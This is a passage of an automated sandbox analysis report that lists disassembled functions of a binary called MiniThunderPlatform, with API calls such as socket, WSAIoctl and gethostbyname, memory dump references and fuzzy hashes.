                                                                                                                                              • __EH_prolog.LIBCMT ref: 1001589E
                                                                                                                                                • Part of subcall function 1000104F: RtlEnterCriticalSection.NTDLL(?), ref: 1000105C
                                                                                                                                                • Part of subcall function 100013D0: __EH_prolog.LIBCMT ref: 100013D5
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100013E8
                                                                                                                                                • Part of subcall function 100013D0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100013F9
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 10001403
                                                                                                                                                • Part of subcall function 100013D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10001413
                                                                                                                                                • Part of subcall function 100155DA: ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(10015A7F,?,10015A7F,?,?,?,10015A7F,?,00000000,?,?), ref: 100155F8
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,?,00000000), ref: 100158E4
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 10015910
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@??1?$basic_string@CriticalH_prologSectionV01@@$??$??append@?$basic_string@D@1@@std@@D@2@@0@0@EnterLeaveV12@V12@@V?$basic_string@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2343244931-0
                                                                                                                                              • Opcode ID: 608a0f8a3eb82a2f3af3ac4069d105c688a2f540b027796a429f6bed23d57612
                                                                                                                                              • Instruction ID: 42ea8bb3bfd8b4aafb5828687c4c3b81d0efc832fdbc00442d48d2f30784d869
                                                                                                                                              • Opcode Fuzzy Hash: 608a0f8a3eb82a2f3af3ac4069d105c688a2f540b027796a429f6bed23d57612
                                                                                                                                              • Instruction Fuzzy Hash: 4911A1B6801118EFDB05DFA8C8859DEB7B8FF18214F00855AF816E3241DB75FA48CB20
                                                                                                                                              Function 1001580D Relevance: 4.5, APIs: 3, Instructions: 49COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 10015812
                                                                                                                                                • Part of subcall function 1000104F: RtlEnterCriticalSection.NTDLL(?), ref: 1000105C
                                                                                                                                                • Part of subcall function 100013D0: __EH_prolog.LIBCMT ref: 100013D5
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100013E8
                                                                                                                                                • Part of subcall function 100013D0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100013F9
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 10001403
                                                                                                                                                • Part of subcall function 100013D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10001413
                                                                                                                                                • Part of subcall function 100155DA: ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(10015A7F,?,10015A7F,?,?,?,10015A7F,?,00000000,?,?), ref: 100155F8
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,?,00000000), ref: 10015858
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 10015881
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@??1?$basic_string@CriticalH_prologSectionV01@@$??$??append@?$basic_string@D@1@@std@@D@2@@0@0@EnterLeaveV12@V12@@V?$basic_string@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2343244931-0
                                                                                                                                              • Opcode ID: 57a87cced626dfc0876669f048b54ce220d1f5fa872d1bfe85a251e1c7306f0d
                                                                                                                                              • Instruction ID: 9cea3c395d6eb0594a0e272565567b2b647f16e6f06653f8e85dc8c227d33347
                                                                                                                                              • Opcode Fuzzy Hash: 57a87cced626dfc0876669f048b54ce220d1f5fa872d1bfe85a251e1c7306f0d
                                                                                                                                              • Instruction Fuzzy Hash: 9B118EB6801108EFCB05CFA8C8859DEB7B8FF1C214F10855AF816E7202DA75EA48CB60
                                                                                                                                              Function 10053F10 Relevance: 4.5, APIs: 3, Instructions: 27networkCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • socket.WS2_32(00000002,00000002,00000000), ref: 10053F27
                                                                                                                                              • WSACreateEvent.WS2_32 ref: 10053F35
                                                                                                                                              • WSAEventSelect.WS2_32(?,00000000,00000003), ref: 10053F49
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Event$CreateSelectsocket
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2360910701-0
                                                                                                                                              • Opcode ID: 182708517aec176302f13da4054e514975dd515a5b7b358aed1cbf5a42566276
                                                                                                                                              • Instruction ID: 9dada67492a68b14be6f18fe2927afc96c243ada2ed30486251eea989294c3b6
                                                                                                                                              • Opcode Fuzzy Hash: 182708517aec176302f13da4054e514975dd515a5b7b358aed1cbf5a42566276
                                                                                                                                              • Instruction Fuzzy Hash: EAF039706017119BD6709F38A84DB4ABBF8EB04B70F514B2CF176CA5D0D7B099888BA0
                                                                                                                                              Function 10031AA0 Relevance: 3.2, APIs: 2, Instructions: 185networkCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • WSAStartup.WS2_32(00000202,?), ref: 10031B09
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Startup
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 724789610-0
                                                                                                                                              • Opcode ID: a26c65fddcd9c26aafbb02154285cc4522e979eb7d68cbff5cdec512f72ab01b
                                                                                                                                              • Instruction ID: b3c869b6f90770828690f8a1d43007291dcfb24bb9d28e88d09a0f32d323a741
                                                                                                                                              • Opcode Fuzzy Hash: a26c65fddcd9c26aafbb02154285cc4522e979eb7d68cbff5cdec512f72ab01b
                                                                                                                                              • Instruction Fuzzy Hash: 8B7139B5A447429FD361CF24C885BEBB7E5FB89701F10892DE59ECB241EB30A845CB52
                                                                                                                                              Function 1000EF20 Relevance: 3.1, APIs: 2, Instructions: 90networkCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • WSASocketA.WS2_32(00000002,00000002,00000000,00000000,00000000,00000000), ref: 1000EF40
                                                                                                                                              • WSAIoctl.WS2_32(00000000,4004747F,00000000,00000000,?,000005F0,00000000,00000000,00000000), ref: 1000EF80
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: IoctlSocket
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1409745359-0
                                                                                                                                              • Opcode ID: 1886e23688439f4de12274673832839f01e84a7e3919a4af34f0977e6e0beb9d
                                                                                                                                              • Instruction ID: 71202b0f52467538a186713f9a3b946fb2239908295b41007dffe14beebabae2
                                                                                                                                              • Opcode Fuzzy Hash: 1886e23688439f4de12274673832839f01e84a7e3919a4af34f0977e6e0beb9d
                                                                                                                                              • Instruction Fuzzy Hash: D6212734640A435AE628D624DC57BBF7391EFC07A5FD4072CF6669A1C5DB78AC014A82
                                                                                                                                              Function 10041220 Relevance: 3.1, APIs: 2, Instructions: 75networkCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 10051320: socket.WS2_32(00000002,00000002,00000000), ref: 1005134E
                                                                                                                                                • Part of subcall function 10051320: WSAGetLastError.WS2_32 ref: 1005135C
                                                                                                                                                • Part of subcall function 10051320: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(create socket object error), ref: 1005136D
                                                                                                                                                • Part of subcall function 10051320: _CxxThrowException.MSVCR71(?,102B9B68), ref: 10051397
                                                                                                                                                • Part of subcall function 10051320: WSAIoctl.WS2_32(?,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 100513D0
                                                                                                                                                • Part of subcall function 10051320: setsockopt.WS2_32(000000FF,0000FFFF,00000020,?,00000001), ref: 100513ED
                                                                                                                                                • Part of subcall function 10051320: WSAGetLastError.WS2_32 ref: 100513F8
                                                                                                                                                • Part of subcall function 10051320: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(setsockopt error), ref: 10051409
                                                                                                                                                • Part of subcall function 10051320: _CxxThrowException.MSVCR71(?,102B9B68), ref: 10051433
                                                                                                                                              • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 10041273
                                                                                                                                              • setsockopt.WS2_32(00000000,0000FFFF,00000020,?,00000001), ref: 10041295
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@ErrorExceptionIoctlLastThrowU?$char_traits@V?$allocator@setsockopt$socket
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 640759157-0
                                                                                                                                              • Opcode ID: 34ffb14b321238a3110c41d7c63543a714df0854616934fdd685ec07bec750b9
                                                                                                                                              • Instruction ID: cf8f2679015cbfcde913065e32d31d55377ea6855234262b95bd932b7769ae00
                                                                                                                                              • Opcode Fuzzy Hash: 34ffb14b321238a3110c41d7c63543a714df0854616934fdd685ec07bec750b9
                                                                                                                                              • Instruction Fuzzy Hash: 70217FB6A00205AFD700DF98C895AAEBBB8FB49720F50462AF616D7781C77469048BE0
                                                                                                                                              Function 004251C0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 71COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • _wcsicmp.MSVCR71(?,-StartTP), ref: 0042522C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _wcsicmp
                                                                                                                                              • String ID: -StartTP
                                                                                                                                              • API String ID: 2081463915-117386193
                                                                                                                                              • Opcode ID: e05b06b1d99bd01747f50e1c468d6f6edc480963a1f5eeca659c1507128d4a02
                                                                                                                                              • Instruction ID: 9510d22fe50860a4189e02cdbd138a362cf1d2d0f138681852d0f46533e00fb7
                                                                                                                                              • Opcode Fuzzy Hash: e05b06b1d99bd01747f50e1c468d6f6edc480963a1f5eeca659c1507128d4a02
                                                                                                                                              • Instruction Fuzzy Hash: BB210671E047089BCB10EB99D842BDDB3B4EB04314F50026EE815AB2C1EB3D5E44CB99
                                                                                                                                              Function 10044EF0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 57COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              • Microsoft Unified Security Protocol Provider, xrefs: 10044F38
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLast
                                                                                                                                              • String ID: Microsoft Unified Security Protocol Provider
                                                                                                                                              • API String ID: 1452528299-238809041
                                                                                                                                              • Opcode ID: e6f3dbc225758d96694ddd9d6fd5e036a776e531268ad0e70f0b9fabaace5c8d
                                                                                                                                              • Instruction ID: 63225e4389cff8cfe7271deee3faf9f65b943841f828574d85c75b6909ddee6d
                                                                                                                                              • Opcode Fuzzy Hash: e6f3dbc225758d96694ddd9d6fd5e036a776e531268ad0e70f0b9fabaace5c8d
                                                                                                                                              • Instruction Fuzzy Hash: 4F11CEB2A40249ABD710CF48DC05B97FBA8FB45720F10827AEA059B681DB766845CBD0
                                                                                                                                              Function 101322D0 Relevance: 3.0, APIs: 2, Instructions: 37networkCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • inet_addr.WS2_32(00000000), ref: 101322E7
                                                                                                                                              • gethostbyname.WS2_32(00000000), ref: 10132301
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: gethostbynameinet_addr
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1594361348-0
                                                                                                                                              • Opcode ID: 256c9229278319a5f2594059a7c205215a5f476eca236573f19ad5f74466f33c
                                                                                                                                              • Instruction ID: ff2c67afd0ced1f043a96cf6bf2312987cb0e041d44446ff7407cf4b2816d143
                                                                                                                                              • Opcode Fuzzy Hash: 256c9229278319a5f2594059a7c205215a5f476eca236573f19ad5f74466f33c
                                                                                                                                              • Instruction Fuzzy Hash: EBF09075200621CFCB10EF29DC88886B7B9FF893727214655F115CB290C338EC80DBA0
                                                                                                                                              Function 10017C45 Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 10017C4A
                                                                                                                                                • Part of subcall function 1000104F: RtlEnterCriticalSection.NTDLL(?), ref: 1000105C
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 10017CA8
                                                                                                                                                • Part of subcall function 100258AC: malloc.MSVCR71(100104C9,?,100104C9,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100258C5
                                                                                                                                                • Part of subcall function 100164DE: __EH_prolog.LIBCMT ref: 100164E3
                                                                                                                                                • Part of subcall function 100164DE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 1001650B
                                                                                                                                                • Part of subcall function 100164DE: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1001653B
                                                                                                                                                • Part of subcall function 100164DE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(product_release_id,?,?,?,7C3869BF), ref: 100165BC
                                                                                                                                                • Part of subcall function 100164DE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(env,?,?,?,7C3869BF), ref: 100165D2
                                                                                                                                                • Part of subcall function 100164DE: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000014,00000000,?,?,?,7C3869BF), ref: 100165FE
                                                                                                                                                • Part of subcall function 100164DE: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,7C3869BF), ref: 1001660E
                                                                                                                                                • Part of subcall function 100164DE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?,?,7C3869BF), ref: 10016631
                                                                                                                                                • Part of subcall function 100164DE: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?,?,?,?,7C3869BF), ref: 10016648
                                                                                                                                                • Part of subcall function 100164DE: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?,?,?,?,7C3869BF), ref: 10016658
                                                                                                                                                • Part of subcall function 100164DE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(setting_file_name,?,?,?,7C3869BF), ref: 10016670
                                                                                                                                                • Part of subcall function 100164DE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(env,?,?,?,7C3869BF), ref: 10016681
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??1?$basic_string@CriticalH_prologSectionV12@V12@@$?append@?$basic_string@?assign@?$basic_string@EnterFileLeaveModuleNamemalloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 503490336-0
                                                                                                                                              • Opcode ID: 995c5e9914607b681f6f533947bd2f71ae1a4fd1354c2f35a1ff99c9d04b9965
                                                                                                                                              • Instruction ID: dea1697f84a8e43b19da3ae16954f32131486239063185f707f1b58ec7f3731f
                                                                                                                                              • Opcode Fuzzy Hash: 995c5e9914607b681f6f533947bd2f71ae1a4fd1354c2f35a1ff99c9d04b9965
                                                                                                                                              • Instruction Fuzzy Hash: 6FF0C278900110DFDB44CBA8DC453AE72F8FB48304F00841EE40AA6681CB74D6808F51
                                                                                                                                              Function 10017D0F Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 10017D14
                                                                                                                                                • Part of subcall function 1000104F: RtlEnterCriticalSection.NTDLL(?), ref: 1000105C
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 10017D72
                                                                                                                                                • Part of subcall function 100258AC: malloc.MSVCR71(100104C9,?,100104C9,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100258C5
                                                                                                                                                • Part of subcall function 1001F765: __EH_prolog.LIBCMT ref: 1001F76A
                                                                                                                                                • Part of subcall function 1001F765: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 1001F78E
                                                                                                                                                • Part of subcall function 1001F765: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(?), ref: 1001F7C3
                                                                                                                                                • Part of subcall function 1001F765: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1001F7CF
                                                                                                                                                • Part of subcall function 1001F765: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001F7E7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$CriticalH_prologSection$??0?$basic_string@??1?$basic_string@?assign@?$basic_string@EnterLeaveV01@V12@V12@@Y?$basic_string@malloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4081292803-0
                                                                                                                                              • Opcode ID: d8a5b186e397dc9d6b02801339476c4be1e77a44545e9800f962a391fd2c7f6b
                                                                                                                                              • Instruction ID: 5b2dfaa4386e200d7dbbf851022c531fdd2b2aff893c8a460d12b96cc1f0b10a
                                                                                                                                              • Opcode Fuzzy Hash: d8a5b186e397dc9d6b02801339476c4be1e77a44545e9800f962a391fd2c7f6b
                                                                                                                                              • Instruction Fuzzy Hash: 7BF0C2B4A05205DBDB14CBA4ED857BD72B4FF48305F10402EF40EE6791DB74E984D611
                                                                                                                                              Function 1001B436 Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1001B43B
                                                                                                                                                • Part of subcall function 1000104F: RtlEnterCriticalSection.NTDLL(?), ref: 1000105C
